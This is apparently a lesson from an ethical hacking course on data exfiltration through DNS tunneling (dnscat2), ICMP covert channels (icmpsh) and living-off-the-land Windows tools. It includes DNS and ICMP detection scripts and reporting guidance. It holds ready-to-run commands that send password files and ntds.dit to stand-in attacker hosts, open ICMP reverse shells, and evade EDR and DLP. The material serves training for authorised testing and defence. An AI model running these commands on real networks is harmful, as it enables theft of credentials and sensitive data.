⚠️ Lab Environment Only: Data exfiltration techniques must only be demonstrated in authorised penetration testing engagements or isolated lab environments. DNS tunneling and ICMP exfiltration techniques directed at production networks without authorisation are illegal and may trigger criminal investigations under computer fraud laws.
Data exfiltration techniques 2026 — you have lateral movement covered from Day 28, credentials dumped, Domain Admin achieved. The engagement objective is not just “get Domain Admin.” It is “demonstrate that a real attacker could steal your sensitive data.” That requires exfiltration — actually moving collected data out of the network through channels that bypass egress filtering, DLP solutions, and firewall outbound rules. Today covers the three protocols that real red teams use because they are almost universally permitted outbound: DNS on port 53, ICMP echo, and HTTPS on 443. The firewall lets all three through. Your data leaves through all three.
🎯 What You’ll Master in Day 29
Understand why DNS, ICMP, and HTTPS are the preferred exfiltration channels
Set up dnscat2 for DNS tunneling exfiltration with a listener and client
Exfiltrate files through ICMP covert channels using icmpsh
Use PowerShell and certutil for living-off-the-land Windows exfiltration
Understand the detection artefacts each technique leaves for blue team awareness
⏱️ 50 min read · 3 exercises
📋 What You’ll Master — Data Exfiltration Techniques 2026
Why Exfiltration Matters — The Last Mile of the Attack Chain
Many penetration test reports stop at “Domain Admin compromised.” The executive team reads this as a technical problem and struggles to translate it into business risk. Adding an exfiltration demonstration transforms the finding: “We achieved Domain Admin and then successfully exfiltrated the HR database, 5,000 user password hashes, and the CFO’s email archive to an external server via DNS traffic that bypassed your DLP solution and firewall egress rules.” That is a finding that gets immediate remediation budget.
🧠 EXERCISE 1 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Design the Exfiltration Strategy for Three Different Egress Control Scenarios
⏱️ Time: 10 minutes · No tools required
You have compromised a workstation inside a corporate network.
You need to exfiltrate a 50MB database backup file.
For each egress control scenario, choose the best exfiltration
technique and explain why:
SCENARIO A: All outbound traffic is blocked except ports 80 and 443.
DNS is resolved by an internal server with no internet access.
ICMP is blocked outbound. No web proxy visible.
→ Which technique? What tool? What does the traffic look like?
SCENARIO B: DNS is allowed outbound to 8.8.8.8.
Port 443 is allowed. Port 80 redirects to a web proxy.
ICMP is not blocked.
→ Which technique? Does proxy inspection affect your choice?
SCENARIO C: Full EDR deployed (CrowdStrike).
All standard ports allowed outbound.
DNS allowed. DLP solution scanning SMTP and FTP.
HTTPS to unknown IPs triggers an alert.
→ Which technique avoids both EDR signatures and DLP scanning?
For each scenario: tool name, command structure, and what you
would collect as proof of successful exfiltration in your report.
✅ Scenario A: HTTPS only — use PowerShell Invoke-RestMethod or certutil to POST data to a legitimate-looking HTTPS endpoint (can use a cloud provider like AWS API Gateway as proxy). Scenario B: DNS tunneling first (most reliable when DNS goes out directly) — dnscat2 through port 53, traffic looks like normal DNS resolution queries. Scenario C: HTTPS to a known-good provider (GitHub, AWS S3, legitimate cloud) — EDR and DLP less likely to alert on traffic destined for recognised cloud infrastructure. Use Invoke-WebRequest to post Base64-encoded chunks to S3.
📸 Write your three exfiltration strategies and share in #day-29-exfiltration on Discord.
DNS Tunneling — Encoding Data in DNS Queries With dnscat2
DNS tunneling encodes data into DNS query subdomains. The client encodes a chunk of data as a Base32 or hex string (both use only characters that are legal in a hostname), appends it as a subdomain of an attacker-controlled domain, and sends the DNS query, e.g. ZmlsZWNvbnRlbnQ=.attacker.com (the Base64 padding character = is not legal in a hostname, which is why Base32 or hex is used in practice). The query does not have to reach the attacker directly: the victim’s ordinary recursive resolver forwards it to the authoritative DNS server for attacker.com, which is the dnscat2 server; it decodes each query and reassembles the exfiltrated data. From the network’s perspective this is normal DNS traffic to a domain on the internet — indistinguishable from standard name resolution unless the query names themselves are inspected, which is why the resolver’s query logs are the place a defender has to look.
DNSCAT2 — SETUP AND FILE EXFILTRATION
# ATTACKER VPS: Install and start dnscat2 server
git clone https://github.com/iagox86/dnscat2.git && cd dnscat2/server
# On attacker: new session appears — interact with it
session -i 1
shell # Drop into command shell
# Exfiltrate a file through the DNS tunnel
download C:\Windows\NTDS\ntds.dit /tmp/ntds.dit
# Alternative — manual DNS exfil with nslookup (no extra tools)
for b in $(xxd -p -c 16 passwords.txt); do nslookup $b.exfil.attacker.com; done
ICMP Exfiltration — Covert Channel Through Ping Packets
ICMP echo requests (ping) are permitted outbound by almost every firewall that allows any internet connectivity. The protocol has an optional data payload field — standard pings send 32-64 bytes of test data, and the protocol itself imposes no limit beyond the maximum size of the carrying IP datagram. By encoding file data into ICMP echo request payloads, icmpsh creates a reverse shell that looks like ping traffic to any DPI that does not inspect ICMP payloads.
ICMPSH — ICMP REVERSE SHELL EXFILTRATION
# ATTACKER: Install icmpsh
git clone https://github.com/inquisb/icmpsh.git && cd icmpsh
# Disable OS ICMP responses (required)
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
# Start listener
sudo python3 icmpsh_m.py ATTACKER_IP TARGET_IP
# VICTIM (Windows): run icmpsh client
icmpsh.exe -t ATTACKER_IP -d 500 -b 30 -s 128
# Once shell received — exfiltrate files
type C:\Users\Administrator\Desktop\passwords.txt
# Manual ICMP exfil — base64 encode file and send in pings
data=$(base64 -w 0 secret_file.txt)
for chunk in $(echo $data | fold -w 40); do ping -c 1 -p $(echo $chunk | xxd -p) ATTACKER_IP; done
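The defender-side view of the same channel, as an added example that is not part of the original course material: a Python check over per-packet echo-request records (time, source, destination, payload length) that flags host pairs whose pings all carry more than a standard 32-64 byte payload and reports their timing regularity and total bytes carried. The records are constructed to resemble a packet-capture export; the 128-byte payload mirrors the -s 128 in the icmpsh command above.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed echo-request records (seconds, src, dst, payload bytes); not from a real capture.
# 10.0.0.7 is an ordinary 1-second ping; 10.0.0.5 sends 128-byte payloads every 500 ms.
SAMPLE_PACKETS = [
    (0.00, "10.0.0.7", "8.8.8.8", 56), (1.01, "10.0.0.7", "8.8.8.8", 56),
    (2.00, "10.0.0.7", "8.8.8.8", 56), (3.02, "10.0.0.7", "8.8.8.8", 56),
    (0.10, "10.0.0.5", "203.0.113.10", 128), (0.60, "10.0.0.5", "203.0.113.10", 128),
    (1.10, "10.0.0.5", "203.0.113.10", 128), (1.60, "10.0.0.5", "203.0.113.10", 128),
    (2.10, "10.0.0.5", "203.0.113.10", 128),
]

def analyse_icmp(packets, max_normal_payload=64, min_packets=4):
    """Group echo requests per (src, dst). A pair is flagged when it has at least
    min_packets and every packet carries more than a standard ping payload.
    The report includes timing regularity and total bytes so the finding can
    state how much data the channel could have carried."""
    flows = defaultdict(list)
    for t, src, dst, size in packets:
        flows[(src, dst)].append((t, size))
    findings = {}
    for key, pkts in flows.items():
        pkts.sort()  # capture exports are not always in time order
        if len(pkts) < min_packets:
            continue
        sizes = [s for _, s in pkts]
        if min(sizes) <= max_normal_payload:
            continue  # at least one normal-sized ping: not the all-oversized pattern
        gaps = [b[0] - a[0] for a, b in zip(pkts, pkts[1:])]
        findings[key] = {
            "packets": len(pkts),
            "payload_bytes": max(sizes),
            "total_bytes": sum(sizes),
            "mean_gap_s": round(mean(gaps), 3),
            "gap_jitter_s": round(pstdev(gaps), 3),  # near zero = machine-regular timing
        }
    return findings
```

A real ping flood at 1-second intervals is also regular, so payload size is the gating condition here and the timing figures are supporting evidence for the report.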
🌐 EXERCISE 2 — TRYHACKME (25 MIN)
Practice Data Exfiltration Techniques on a TryHackMe Room
⏱️ Time: 25 minutes · Free TryHackMe account
Step 1: Go to tryhackme.com and search for “Data Exfiltration”
Open the “Data Exfiltration” room (free)
Step 2: Deploy the machine and connect via VPN
Step 3: The room walks through multiple exfiltration techniques:
– HTTP exfiltration
– HTTPS exfiltration
– DNS tunneling with iodine or dnscat2
Complete the HTTP exfiltration task first
Step 4: Follow the room’s instructions to:
a) Identify which protocols are permitted outbound
b) Set up the appropriate listener
c) Exfiltrate the target file
d) Confirm receipt on the attacker side
Step 5: For each technique you successfully demonstrate:
Record:
– Tool used
– Command on victim side
– Command on attacker side
– What the traffic looks like in Wireshark
– What detection rule would catch it
Step 6: Complete at least two different exfiltration techniques
Compare the setup complexity vs stealth level of each
✅ What you just learned: The TryHackMe room provides a safe controlled environment to practice the full exfiltration workflow — victim setup, attacker listener, file transfer, and verification. The most valuable output from Step 5 is the Wireshark observation: DNS exfiltration shows a high volume of queries to one unusual domain; HTTPS exfiltration looks identical to normal web browsing. This detection analysis directly informs the “Detection and Response” section of your penetration test report — telling the client not just what you did, but what monitoring they need to catch it.
📸 Screenshot successful file exfiltration confirmation and share in #day-29-exfiltration on Discord.
HTTPS and Living-Off-The-Land Windows Exfiltration
Living-off-the-land exfiltration uses legitimate Windows tools already present on the target machine. No additional binaries to drop, no AV triggers from unknown executable hashes, no unusual process spawning. PowerShell, certutil, and BITSAdmin are all signed Microsoft tools that appear in normal Windows operation — their use for exfiltration is extremely difficult to distinguish from legitimate administrator activity without behavioural context.
✅ What you just learned: The DNS exfil simulation demonstrates the complete encode-transmit-decode cycle without needing an external VPS. Step 5 is the key insight — every byte of the creds.txt file was reconstructed from the DNS query subdomain strings captured in the PCAP. In a real engagement, the tcpdump capture represents what your dnscat2 server receives from the compromised host. The hex encoding in the subdomains (Step 3) is what makes DNS exfiltration invisible to firewalls that only filter by port and protocol without inspecting DNS query content for encoded non-ASCII data.
📸 Screenshot the decoded file content reconstructed from DNS queries and share in #day-29-exfiltration on Discord. Tag #dataexfil2026
Detection Artefacts — What Blue Teams See Per Technique
Every exfiltration technique leaves detection artefacts. Understanding these shapes how you write the detection and remediation section of your penetration test report, and demonstrates a level of professionalism that distinguishes senior testers from junior ones. DNS tunneling generates an anomalously high volume of queries to a single domain with encoded-looking subdomains — SIEM rules alert when a host queries one external domain hundreds of times per minute. ICMP exfiltration shows ICMP packets with large, non-standard payload sizes and suspiciously regular timing. HTTPS exfiltration blends most effectively but leaves access logs on the receiving server and may trigger DLP alerts if the payload contains recognisable sensitive data patterns.
Reporting Exfiltration in Penetration Test Deliverables
The exfiltration finding in a penetration test report should contain: the technique used, the specific data exfiltrated (or a safe representative sample), the egress control bypassed, the detection gap identified, and concrete remediation recommendations. Generic recommendations like “implement DLP” are not sufficient — specify the detection rule (DNS query rate threshold per domain), the log source (DNS query logs), and the SIEM correlation logic that would have caught this specific technique during the assessment.
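As a concrete form of the detection rule described above (query volume per domain from DNS query logs) and of the hex reconstruction mentioned in the DNS exfil simulation, here is an added example that is not part of the original course material: a Python script that groups resolver query-log lines per client and registered domain, flags groups whose leftmost labels are long hex strings, and reassembles the hex in log order for the forensic record. The log format and sample lines are constructed, the two-label "registered domain" is a simplification, and the query threshold is set low for the sample where a SIEM rule would use hundreds per minute.

```python
import re
from collections import defaultdict

# Constructed resolver query-log lines: "<timestamp> <client> <qname>". Not from a real capture.
SAMPLE_LOG = """\
2026-01-15T10:00:00 10.0.0.5 www.example.com
2026-01-15T10:00:01 10.0.0.5 757365723a70617373.exfil.attacker.com
2026-01-15T10:00:01 10.0.0.5 776f72643132330a.exfil.attacker.com
2026-01-15T10:00:02 10.0.0.5 61646d696e3a5365.exfil.attacker.com
2026-01-15T10:00:02 10.0.0.5 637265743132330a.exfil.attacker.com
2026-01-15T10:00:03 10.0.0.7 mail.example.com
"""

# A leftmost label that is nothing but hex and at least 8 characters long is the artefact
# the page describes; real hostnames almost never look like this.
HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")

def registered_domain(qname):
    """Last two labels (assumption for the demo; production code should use the public-suffix list)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])

def parse_log(text):
    """Split each log line into (timestamp, client, qname)."""
    rows = []
    for line in text.splitlines():
        ts, client, qname = line.split()
        rows.append((ts, client, qname.lower().rstrip(".")))
    return rows

def analyse(rows, min_queries=4, min_hex_ratio=0.8):
    """Per (client, registered domain): flag groups with at least min_queries whose
    leftmost labels are mostly hex, and reassemble that hex in log order."""
    groups = defaultdict(list)
    for _ts, client, qname in rows:
        groups[(client, registered_domain(qname))].append(qname.split(".")[0])
    findings = {}
    for key, labels in groups.items():
        hex_labels = [l for l in labels if HEX_LABEL.match(l)]
        ratio = len(hex_labels) / len(labels)
        if len(labels) >= min_queries and ratio >= min_hex_ratio:
            joined = "".join(hex_labels)
            findings[key] = {
                "queries": len(labels),
                "hex_ratio": ratio,
                # Reconstruction assumes the log preserves query order and holds no retransmits;
                # dnscat2-style framing would need its sequence numbers stripped first.
                "decoded": bytes.fromhex(joined[: len(joined) & ~1]),  # drop a dangling nibble
            }
    return findings
```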
🧠 QUICK CHECK — Day 29
You are on a compromised Windows host. Outbound TCP is blocked except port 443. ICMP is blocked. But DNS queries resolve correctly. What is your best data exfiltration option and why?
📋 Key Commands — Day 29 Exfiltration Reference Card
dnscat2 server (VPS) + client (target): DNS tunnel — all traffic encoded in DNS queries on UDP 53
icmpsh_m.py ATTACKER TARGET (disable ICMP replies first): ICMP reverse shell — data in ping packet payloads
Invoke-RestMethod -Uri https://attacker/upload -Body $encoded: PowerShell HTTPS exfil — living-off-the-land, no extra binaries
certutil -encode file.bin file.b64: Windows certutil base64 encode before exfiltration
bitsadmin /transfer job /upload https://host/up file.txt: BITSAdmin upload — legitimate Windows background transfer service
xxd -p file | fold -w 63 | xargs -I{} nslookup {}.domain: Manual DNS exfil — encode file as hex, send in DNS subdomains
🏆 Mark Day 29 as Complete
The attack chain is now complete through Day 29: recon → enumeration → exploitation → lateral movement → credential dumping → data collection → exfiltration. You can now demonstrate end-to-end compromise impact in penetration test deliverables — not just “we got Domain Admin” but “we got Domain Admin and then exfiltrated this data through these channels that bypassed your controls.”
❓ Frequently Asked Questions
What is data exfiltration in penetration testing?
Simulated movement of collected data out of a compromised network to demonstrate that an attacker could successfully exfiltrate sensitive information despite egress controls. It completes the engagement kill chain and translates technical domain compromise into business-language risk about actual data theft.
Why is DNS commonly used for data exfiltration?
DNS UDP port 53 is almost universally permitted outbound — blocking it breaks all internet connectivity. Most DLP solutions do not inspect DNS query subdomains for encoded data. DNS exfil blends perfectly with normal name resolution traffic and bypasses firewalls that only filter by port and protocol.
What is dnscat2 and how does it work?
Dnscat2 is a DNS-based C2 and exfiltration tool. The server runs on an attacker VPS; the client runs on the compromised host. All communication is encoded into DNS query subdomains for an attacker-controlled domain. Creates a bidirectional channel tunneled entirely through DNS — bypassing firewalls that permit outbound DNS.
What are the most detectable data exfiltration techniques?
Most detectable: raw FTP/TCP (uncommon protocols), high-volume DNS (rate anomaly detection). Least detectable: HTTPS to recognised cloud infrastructure, slow-rate DNS exfil staying below anomaly thresholds, and living-off-the-land Windows tools (certutil, BITSAdmin) that appear in normal administrative activity.
What comes after data exfiltration in the course?
Day 30 covers Post-Exploitation Persistence — registry run keys, startup folders, scheduled tasks, WMI subscriptions, and service installation. After demonstrating data collection and exfiltration, Day 30 shows how attackers maintain access without re-exploiting the initial vulnerability.
📚 Further Reading
Lateral Movement Techniques 2026 — Day 28 covers PSExec, WMI, WinRM, and DCOM lateral movement — the phase that positions you on the most valuable hosts from which to collect and exfiltrate data.
BloodHound Tutorial 2026 — Day 27 maps attack paths to the systems containing the highest-value data targets — NTDS.dit on Domain Controllers, SQL databases, file shares — that are the primary exfiltration objectives.
100-Day Ethical Hacking Course — The complete course hub — Day 29 data exfiltration is part of Phase 3 (Days 26–35) covering the complete post-compromise lifecycle from lateral movement through persistence.
dnscat2 GitHub Repository — The official dnscat2 source code, server and client installation guides, and documentation covering all tunnel modes, encryption, and multi-session management.
MITRE ATT&CK — Exfiltration — The definitive MITRE ATT&CK Exfiltration tactic page listing all known techniques including T1048 (Exfiltration Over Alternative Protocol) covering DNS and ICMP with real-world procedure examples.
Mr Elite
Owner, SecurityElites.com
The engagement where exfiltration changed everything was a financial institution that had invested heavily in perimeter security. State-of-the-art next-gen firewall, IDS/IPS on the external boundary, DLP scanning all SMTP and FTP traffic. Their security team genuinely believed data could not leave the network without being detected. We got Domain Admin on day three through a misconfigured Active Directory DACL. We then exfiltrated 2GB of data including the complete Active Directory database through DNS tunneling over three hours. The DNS queries to our dnscat2 server appeared in their logs as failed lookups for an unknown domain. Their SIEM had no rule for DNS query rate anomalies. Their DLP did not inspect DNS. The board presentation six weeks later used that 2GB number as the centrepiece of the risk discussion. Not “Domain Admin achieved.” That 2GB. Exfiltration makes the risk real to people who write remediation budget cheques.